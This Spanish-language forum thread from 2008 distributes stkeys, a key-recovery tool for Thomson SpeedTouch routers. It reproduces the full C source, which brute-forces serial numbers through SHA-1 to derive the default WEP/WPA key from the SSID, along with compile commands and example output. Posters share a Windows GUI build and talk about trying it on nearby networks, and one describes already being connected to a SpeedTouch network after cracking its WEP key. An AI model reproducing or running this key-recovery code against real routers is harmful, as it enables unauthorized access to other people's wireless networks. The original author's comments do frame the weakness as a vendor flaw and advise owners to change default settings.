Online

  • Punto Visitantes: 81
  • Punto Oculto(s): 0
  • Punto Usuarios: 8
  • Punto Usuarios en Línea:


Board Stats

  • stats Total de Usuarios: 14486
  • stats Total de Mensajes: 83879
  • stats Total de Temas: 7959
  • stats Total de Categorías: 15
  • stats Total de Foros: 68
  • stats Máx. usuarios conectados (simultáneamente): 818

Ultimo registro

Top Poster

lampi lampi
36887 Mensajes
maripuri maripuri
17767 Mensajes
kcdtv kcdtv
4578 Mensajes
betis-jesus betis-jesus
3393 Mensajes
1camaron1 1camaron1
2299 Mensajes

Recursos












Autor Tema: La WPA de los SpeedTouch con STKEYS GUI - WPA Windows  (Leído 153343 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado lampi

  • Master
  • Usuario
  • *
  • Mensajes: 36887
  • ViladeCans
La WPA de los SpeedTouch con STKEYS GUI - WPA Windows
« en: Abril 18, 2008, 23:04:47 pm »
stkeys ya esta compilado para windows lo saco del foro de banned y por lo que leo se ve que no se que de algorritmo y tal y muchos numeros pero por lo que se ve funciona, asi que meteremos el stkeys en el erw y ya tenemos otro en la saca  ;D ya era hora que se animase el tema de la wpa aunque esto solo funciona con los Thomson modelos 580i i 585v6 y quizas alguno mas.
Default WEP/WPA key algorithm for Thomson routers
Citar
El algoritmo se encontró en el interior de la stInstall.exe
La versión se distribuye en España por ORANGE
Kevin Devine


http://img106.imageshack.us/img106/5043/downloadch5.gif
La WPA de los SpeedTouch con STKEYS GUI - WPA Windows

Donwload STKEYS GUI -WPA windows
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

http://img257.imageshack.us/img257/7194/stkeysguifb8.gif
La WPA de los SpeedTouch con STKEYS GUI - WPA Windows




http://img292.imageshack.us/img292/4232/stkeyslampiweblq9.jpg
La WPA de los SpeedTouch con STKEYS GUI - WPA Windows

http://img291.imageshack.us/img291/8337/stkeyslampiwebnl1.jpg
La WPA de los SpeedTouch con STKEYS GUI - WPA Windows


Y esto lo de siempre al llevar embebidos algunos antivirus dan falso positivos.
http://img90.imageshack.us/img90/1052/stkeysguiwpalampiwebrq2.jpg
La WPA de los SpeedTouch con STKEYS GUI - WPA Windows
« última modificación: Noviembre 09, 2010, 22:17:03 pm por lampi »
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
-
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

Desconectado lampi

  • Master
  • Usuario
  • *
  • Mensajes: 36887
  • ViladeCans
Re: Llega la desencriptacion de la WPA de los SpeedTouch con stkeys
« Respuesta #1 en: Abril 18, 2008, 23:18:14 pm »
Seria de utilidad que el que tenga en casa una de estas, me pase el ssid y la pass para probarlo y si rula bien, metemos el stkeys en el erw y sera mas comodo para todos.

[ Default WEP/WPA key algorithm for Thomson routers ]
*************************************************
Author: Kevin Devine <wyse101 0x40 gmail.com>
Date:   April 2008

Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.




/*
   **************************************************************************
   *                                                                        *
   * Default WEP/WPA key generation for Thomson series wireless routers     *
   *                                                                        *
   *   Date: March 15th 2008                                                *
   *   Author: Kevin Devine <
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
>                             *
   *                                                                        *
   **************************************************************************

   AFAIK, this is a well known problem by some ISP.
   It is likely to affect any owner of a Thomson wireless router with
   default settings installed.

   **************************************************************************

   The format of a serial number:

   CP YY WW PP XXX (CC)

   And from what i can tell of the following serial number taken from
   router i received.

   CP 06 15 JT 109 (53)

   YY is the year produced.      ( 2006  ) ?
   WW is the week of year.       ( some week of April ) ?
   PP is the production code.    ( JT ) factory code?
   CC is the configuration code. ( 53 ) seems to be 00 - ZZ (0-9/A-Z)

   I can only guess that the XXX values represent the unit number

   **************************************************************************

   The key generation is simple enough.

   Take as example: "CP0615JT109 (53)"

   Remove the CC and PP values

     "CP0615109"

   Convert the XXX values to hexadecimal.

     "CP0615313039"

   Process with SHA-1

     742da831d2b657fa53d347301ec610e1ebf8a3d0

   The last 3 bytes are converted to 6 byte string, and appended to
   the word "SpeedTouch" which becomes the default SSID.

     "SpeedTouchF8A3D0"

   The first 5 bytes are converted to a 10 byte string which
   becomes the default WEP/WPA key.

    "742DA831D2"

   Thats it..
   **************************************************************************

   I was unable to determine if its possible to obtain the base serial
   number from the MAC, but it can't be ruled out.

   The method of recovery here using brute force attack of the
   default SSID octets, is pretty lame..but is enough for now.

   Theoretically, with 3 octets, no more than ~2 attempts are required
   before successfully accessing the router.

   When only 2 octets are provided, (example:BT Voyager/Home Hub routers)
   more potential keys are generated, with further required attempts -
   an average of 80.

   This still improves odds of an attacker gaining access
   to WPA protected routers - more so if an attacker can capture a WPA
   handshake and crack with Aircrack,Cain & Abel or offline with coWPAtty.
   
   Obviously the problem is with implementation of key/ssid generation
   and not WPA itself.
   **************************************************************************
   
   The only solution _right now_ is to have customers either turn off wireless
   (if its not being used), or change the default settings.

   To compile, use:

     gcc -fomit-frame-pointer -O3 -funroll-all-loops stkeys.c sha1.c -ostkeys
   
   Use OpenSSL SHA-1 for this to run faster..
   
   Example usage for ST585v6 router:
     
      SSID: "SpeedTouchF8A3D0":

   c:\stkeys -v -iF8A3D0

   Serial Number: CP0615**109 - potential key = 742DA831D2  <- this is the right one
   Serial Number: CP0621**AHJ - potential key = 00651124D9

   Found 2 potential keys.

*/

#include <stdio.h>
#include <getopt.h>

#include "sha1.h"

#define SHA1Init SHA1Reset
#define SHA1Update SHA1Input
#define SHA1Final SHA1Result
#define SHA1_CTX SHA1Context

typedef unsigned char u8;
typedef unsigned int u32;

const u8 charTable[]="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
const u8 hexTable[]="0123456789ABCDEF";
      u8 serial[13]={'C','P','0',0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};

#define SERIAL_LENGTH 12
#define MAX_SSID_OCTETS 6
#define DEFAULT_KEY_SIZE 5

#define hexmsb(x)(hexTable[((x & 0xf0) >> 4)])
#define hexlsb(x)(hexTable[ (x & 0x0f)])

void usage(char **argv) {

    fprintf(stdout,"\n\tUso: %s [ -i <ssid octets> ] [ -o <output file> ]\n"
                   "\n\t -i : Los octetos hexadecimales del SSID del router Thomson"
                   "\n\t -o : Especificar el fichero de salida para las posibles claves"
                   "\n\t -v : Imprime en pantalla las posibles claves encontradas\n\n",*argv);
                 
    exit(0);
}

/*
 * convert hexadecimal ssid string to binary
 * return 0 on error or binary length of string
 *
 */
u32 str2ssid(u8 ssid[],u8 *str) {

    u8 *p,*q = ssid;
    u32 len = strlen(str);

    if( (len % 2) || (len > MAX_SSID_OCTETS) )
      return(0);

    for(p = str;(*p = toupper(*p)) && (strchr(hexTable,*p)) != 0;) {

      if(--len % 2) {
        *q = ((u8*)strchr(hexTable,*p++) - hexTable);
        *q <<= 4;
      }else {
        *q++ |= ((u8*)strchr(hexTable,*p++) - hexTable);
      }
    }
    return( (len) ? 0 : (p - str) / 2);
}

/*
 * print 5 bytes to output file
 *
 */
void dump_key(FILE *out, u8 *key) {
 
    u32 i;
    u8 *p = key;

    for(i = 0;i < DEFAULT_KEY_SIZE;i++)
      fprintf(out,"%.2X",*p++);

    fprintf(out,"\n");
}

int main(int argc, char **argv) {

    u8 sha1_digest[40]={0};
    u8 ssid[8]={0},buf[8]={0},year,week,x1,x2,x3;
    u32 keys = 0,ssidLen = 0,verbose = 0, opt = 0;
    u8 *p,*q,*strId = NULL;
    FILE *ofile = NULL;

    SHA1_CTX sha1_ctx;

    if(argc > 1) {
      while( (opt = getopt(argc, argv,"vo:i:")) != -1) {

        switch(opt) {

          case 'i' :
            strId = optarg;
            break;

          case 'o' :
            if((ofile = fopen(optarg,"wb")) == NULL) {
              fprintf(stderr,"\nNo puedo abrir %s para la salida.\n",optarg);
              return(0);
            }
            break;

          case 'v' :
            verbose++;
            break;

          default:
            usage(argv);
        }
      }

      if(!strId) usage(argv);

      if(!(ssidLen = str2ssid(ssid,strId))) usage(argv);

      fprintf(stdout,"\nGenerando claves... por favor espera\n\n");

        // generate values only for 2005/2007..change if you want.

        for(year = 5;year <= 7;year++) {

          serial[3] = year | '0';

          // 52 weeks of the year

          for(week = 1;week <= 52;week++) {
           
            serial[4] = (week / 10) + '0';
            serial[5] = (week % 10) + '0';

            for(x1 = 0;x1 < 36;x1++) {

              serial[6] = hexmsb(charTable[x1]);
              serial[7] = hexlsb(charTable[x1]);

              for(x2 = 0;x2 < 36;x2++) {

                serial[8] = hexmsb(charTable[x2]);
                serial[9] = hexlsb(charTable[x2]);

                for(x3 = 0;x3 < 36;x3++) {

                  serial[10] = hexmsb(charTable[x3]);
                  serial[11] = hexlsb(charTable[x3]);

                  // hash serial number with sha-1

                  SHA1Init(&sha1_ctx);
                  SHA1Update(&sha1_ctx,serial,SERIAL_LENGTH);
                  SHA1Final(&sha1_ctx,sha1_digest);

                  // compare SSID octets with last number of bytes supplied

                  if(memcmp(&sha1_digest[(20-ssidLen)],ssid,ssidLen) == 0) {

                    keys++;

                    if(verbose) {

                      memcpy(buf,serial,6);

                      fprintf(stdout,
                              "Número de Serie: %s**%C%C%C - posible clave = ",
                              buf,charTable[x1],charTable[x2],charTable[x3]);

                      dump_key(stdout,sha1_digest);
                    }
                    if(ofile) {
                      dump_key(ofile,sha1_digest);
                    }
                  }
                }
              }
            }
          }
        }
      fprintf(stdout,"\nResultado: %d posibles claves.\n\n",keys);

      if(ofile) fclose(ofile);
    }
    else {
        usage(argv);
    }
    return(0);
}
« última modificación: Abril 22, 2008, 00:49:26 am por lampi »
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
-
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

icehot

  • Visitante
Re: Llega la desencriptacion de la WPA de los SpeedTouch con stkeys
« Respuesta #2 en: Abril 18, 2008, 23:29:30 pm »
Creo que puedo conseguirte uno de un compi que tenia orange,se ha dado de baja pero supongo que la clave aun se la sabra.
He leido lo del foro de seguridad,estan super animados pues parece que es el primer paso para las wpa,me alegro ahora le toca a win2.
Un saludo

Desconectado lampi

  • Master
  • Usuario
  • *
  • Mensajes: 36887
  • ViladeCans
Re: Llega la desencriptacion de la WPA de los SpeedTouch con stkeys
« Respuesta #3 en: Abril 18, 2008, 23:36:00 pm »
Algo es algo pero al no ser algo  estandar tampoco es para lanzar cohetes.
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
-
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

icehot

  • Visitante
Re: Llega la desencriptacion de la WPA de los SpeedTouch con stkeys
« Respuesta #4 en: Abril 18, 2008, 23:45:36 pm »
lampi el enlace del codigo fuente te remite a seguridad wire..donde esta ??? ???,el stkeys lo tengo del enlace de su pag.pero sacado del foro.

Desconectado lampi

  • Master
  • Usuario
  • *
  • Mensajes: 36887
  • ViladeCans
Re: Llega la desencriptacion de la WPA de los SpeedTouch con stkeys
« Respuesta #5 en: Abril 18, 2008, 23:54:52 pm »
Luego monto esta gui rapida, asi los que saben menos lo podran usar.

http://img444.imageshack.us/img444/8558/stkeyslampiwebcomhx1.jpg
La WPA de los SpeedTouch con STKEYS GUI - WPA Windows
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
-
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

Desconectado lampi

  • Master
  • Usuario
  • *
  • Mensajes: 36887
  • ViladeCans
Re: Llega la desencriptacion de la WPA de los SpeedTouch con stkeys
« Respuesta #6 en: Abril 18, 2008, 23:56:39 pm »
lampi el enlace del codigo fuente te remite a seguridad wire..donde esta ??? ???,el stkeys lo tengo del enlace de su pag.pero sacado del foro.


Es verdad, voy a ver.
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
-
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

Desconectado lampi

  • Master
  • Usuario
  • *
  • Mensajes: 36887
  • ViladeCans
Re: Llega la desencriptacion de la WPA de los SpeedTouch con stkeys
« Respuesta #7 en: Abril 19, 2008, 00:00:59 am »
Ya va el link.
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
-
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

icehot

  • Visitante
Re: Llega la desencriptacion de la WPA de los SpeedTouch con stkeys
« Respuesta #8 en: Abril 19, 2008, 00:11:23 am »
Ok compi,te miro lo dicho.

Desconectado lampi

  • Master
  • Usuario
  • *
  • Mensajes: 36887
  • ViladeCans
Re: La WPA de los SpeedTouch con STKEYS GUI -WPA windows
« Respuesta #9 en: Abril 19, 2008, 00:58:13 am »
De aqui a un rato os lo cuelgo.

http://img213.imageshack.us/img213/2497/stkeysguilampiwebif4.jpg
La WPA de los SpeedTouch con STKEYS GUI - WPA Windows
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
-
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

Desconectado lampi

  • Master
  • Usuario
  • *
  • Mensajes: 36887
  • ViladeCans
Re: La WPA de los SpeedTouch con STKEYS GUI -WPA Windows
« Respuesta #10 en: Abril 19, 2008, 01:26:48 am »
http://img106.imageshack.us/img106/5043/downloadch5.gif
La WPA de los SpeedTouch con STKEYS GUI - WPA Windows

Donwload STKEYS GUI -WPA windows
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

http://img257.imageshack.us/img257/7194/stkeysguifb8.gif
La WPA de los SpeedTouch con STKEYS GUI - WPA Windows




Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.


La 1:30 me piro que mañana curro un poco.  ;)
« última modificación: Abril 19, 2008, 22:38:37 pm por lampi »
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
-
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

Desconectado nuevoporaqui

  • Usuario
  • *
  • Mensajes: 14
Re: La WPA de los SpeedTouch con STKEYS GUI -WPA Windows
« Respuesta #11 en: Abril 19, 2008, 10:33:40 am »
Vamos a ver si funciona, tengo un cliente a mi alcance.

Gracias

Desconectado acadaca

  • Usuario
  • *
  • Mensajes: 37
Re: La WPA de los SpeedTouch con STKEYS GUI - WPA Windows
« Respuesta #12 en: Abril 19, 2008, 13:29:48 pm »
vamos a probar a ver que tal va esto, muchas gracias

Menargas

  • Visitante
Re: La WPA de los SpeedTouch con STKEYS GUI - WPA Windows
« Respuesta #13 en: Abril 19, 2008, 13:33:31 pm »
Bueno algo es algo, ya tenemos escusa para soltar el erw 2.3 "automatic", ahora la cosa está en que alguien que tenga uno de estos routers lo pruebe

Un saludo

TOSTADO

  • Visitante
Re: La WPA de los SpeedTouch con STKEYS GUI - WPA Windows
« Respuesta #14 en: Abril 19, 2008, 13:42:12 pm »
ola   estoy  conectado  en  una  rede   con  este  nome  SpeedTouch.lan  me   hizo  falta  cerca  de  4 milhones  de  ivs,  avia  una  clave  de  26 digitos    jajajaja     mas  voy  provar   este  ver  si  es  algo  mas  rapido

Desconectado lampi

  • Master
  • Usuario
  • *
  • Mensajes: 36887
  • ViladeCans
Re: La WPA de los SpeedTouch con STKEYS GUI - WPA Windows
« Respuesta #15 en: Abril 19, 2008, 13:45:55 pm »
ola   estoy  conectado  en  una  rede   con  este  nome  SpeedTouch.lan  me   hizo  falta  cerca  de  4 milhones  de  ivs,  avia  una  clave  de  26 digitos    jajajaja     mas  voy  provar   este  ver  si  es  algo  mas  rapido


Se dice que para la wep, el stkeys no es tan fiable pero asi puedes probarlo y dices si te da la misma key.
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
-
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

Desconectado erborricobueno

  • Grupo de trabajo
  • Usuario
  • *****
  • Mensajes: 2069
Re: La WPA de los SpeedTouch con STKEYS GUI - WPA Windows
« Respuesta #16 en: Abril 19, 2008, 13:51:58 pm »
Los enlaces estan bien?

Desconectado lampi

  • Master
  • Usuario
  • *
  • Mensajes: 36887
  • ViladeCans
Re: La WPA de los SpeedTouch con STKEYS GUI - WPA Windows
« Respuesta #17 en: Abril 19, 2008, 13:53:21 pm »
Al montarlo tan rapido me equivoque en la fecha 19/03/08 y estamos en Marzo pero ya no lo cambio por que se integrara en el erw cuando se pueda.
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
-
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

Desconectado lampi

  • Master
  • Usuario
  • *
  • Mensajes: 36887
  • ViladeCans
Re: La WPA de los SpeedTouch con STKEYS GUI - WPA Windows
« Respuesta #18 en: Abril 19, 2008, 13:54:08 pm »
Los enlaces estan bien?

You requested stkeys-gui-wpa.exe (505.31 KB)
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
-
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

Desconectado erborricobueno

  • Grupo de trabajo
  • Usuario
  • *****
  • Mensajes: 2069
Re: La WPA de los SpeedTouch con STKEYS GUI - WPA Windows
« Respuesta #19 en: Abril 19, 2008, 13:55:22 pm »
Los enlaces estan bien?

You requested stkeys-gui-wpa.exe (505.31 KB)


Digo el del código fuente

Desconectado lampi

  • Master
  • Usuario
  • *
  • Mensajes: 36887
  • ViladeCans
Re: La WPA de los SpeedTouch con STKEYS GUI - WPA Windows
« Respuesta #20 en: Abril 19, 2008, 13:57:24 pm »
Se ve que tiene truco.  :D ya los subire o para que ya tenemos la gui.
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
-
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

Desconectado erborricobueno

  • Grupo de trabajo
  • Usuario
  • *****
  • Mensajes: 2069
Re: La WPA de los SpeedTouch con STKEYS GUI - WPA Windows
« Respuesta #21 en: Abril 19, 2008, 13:58:45 pm »
Se ve que tiene truco.  :D ya los subire o para que ya tenemos la gui.

Subelo si puedes,quiero ver como va,gracias.

Desconectado lampi

  • Master
  • Usuario
  • *
  • Mensajes: 36887
  • ViladeCans
Re: La WPA de los SpeedTouch con STKEYS GUI - WPA Windows
« Respuesta #22 en: Abril 19, 2008, 14:03:15 pm »
Aqui esta, el codigo y el compilado.

Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.




Me dicen que algunas redes solo tienen 4 ultimos digitos y no 6 por lo seguro que solo valen para las redes mas ultimas o ya leere un poco mas.

Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
-
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

Desconectado erborricobueno

  • Grupo de trabajo
  • Usuario
  • *****
  • Mensajes: 2069
Re: La WPA de los SpeedTouch con STKEYS GUI - WPA Windows
« Respuesta #23 en: Abril 19, 2008, 14:05:10 pm »
Aqui esta, el codigo y el compilado.

Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.




Me dicen que algunas redes solo tienen 4 ultimos digitos y no 6 por lo seguro que solo valen para las redes mas ultimas o ya leere un poco mas.



Tendré que buscar algún amig@ que me deje probar.

Desconectado lampi

  • Master
  • Usuario
  • *
  • Mensajes: 36887
  • ViladeCans
Re: La WPA de los SpeedTouch con STKEYS GUI - WPA Windows
« Respuesta #24 en: Abril 19, 2008, 14:25:48 pm »
Segun leo el stkeys abarca este tipo de router de fabricacion desde el 2004 hasta el 2007 y seran ssid de tipo SpeedTouch123456

http://img261.imageshack.us/img261/9243/stkeyslampiwebfk1.jpg
La WPA de los SpeedTouch con STKEYS GUI - WPA Windows
« última modificación: Abril 21, 2008, 19:42:44 pm por lampi »
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
-
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.